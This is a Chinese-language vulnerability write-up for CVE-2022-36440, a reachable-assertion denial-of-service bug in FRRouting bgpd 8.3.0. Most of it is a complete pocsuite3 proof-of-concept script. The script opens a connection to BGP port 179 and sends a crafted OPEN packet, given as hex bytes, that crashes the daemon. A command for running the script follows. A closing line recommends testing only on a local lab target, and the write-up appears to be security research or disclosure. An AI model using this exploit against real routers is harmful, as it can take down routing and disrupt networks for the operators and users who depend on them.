CVE-2022-36440 是一个影响 FRRouting frr-bgpd 8.3.0 版本的拒绝服务漏洞。该漏洞存在于 peek_for_as4_capability 函数中,攻击者可以构造恶意的 BGP OPEN 数据包,并将其发送给运行 frr-bgpd 的 BGP 对等体,导致服务拒绝。
攻击者可以构造一个特制的 BGP OPEN 包并发送至受影响的 BGP 对等体,触发一个可达性断言错误,导致目标设备崩溃或停止响应,进而引发拒绝服务 (DoS) 攻击。
请求示例:
from pocsuite3.api import POCBase, Output, register_poc, logger
import socket
class FRRoutingBGPDOSPOC(POCBase):
vulID = "CVE-2022-36440"
version = "1.0"
author = ['xzh', 'tzh00203']
vulDate = "2022-08-17"
createDate = "2024-12-24"
updateDate = "2024-12-24"
references = ["https://nvd.nist.gov/vuln/detail/CVE-2022-36440"]
name = "FRRouting bgpd Reachable Assertion DoS Vulnerability"
appPowerLink = "https://frrouting.org/"
appName = "FRRouting"
appVersion = "8.3.0"
vulType = "Denial of Service"
desc = "A reachable assertion was found in FRRouting frr-bgpd 8.3.0 in the peek_for_as4_capability function. Attackers can maliciously construct BGP OPEN packets and send them to BGP peers running frr-bgpd, resulting in a denial of service."
def _verify(self):
result = {}
payload = b'\xff' * 16 + b'\x00\x22\x01\x04\x00\x02\x00\x05\xac\x11\x00\x01\xff\xff\x00\x02\x00\x00'
target_ip = self.target.split(':')[0]
target_port = int(self.target.split(':')[1]) if ':' in self.target else 179
try:
logger.info(f"Connecting to {target_ip}:{target_port}...")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((target_ip, target_port))
sock.recv(1024)
# start
sock.send(payload)
response = sock.recv(4096)
sock.close()
if response == b'':
result["VerifyInfo"] = {
"URL": self.target,
}
except Exception as e:
logger.error(f"Connection failed: {e}")
return self.parse_output(result)
def _attack(self):
return self._verify()
register_poc(FRRoutingBGPDOSPOC)
# 构造恶意BGP OPEN包并发送到目标
pocsuite -u target_ip:port -r CVE_poc
通过上述代码,攻击者可以向目标设备发送特制的 BGP OPEN 数据包,触发目标设备的断言错误,从而导致拒绝服务。
注意:验证目标设备是否存在此 DoS 漏洞,请在本地受控的环境下对靶机测试
📝 作者:tzh00203 📧 邮箱:tian-zh24@mails.tsinghua.edu.cn 🏫 单位:Tsinghua Uni. NISL 📅 最后更新时间:2025-08-04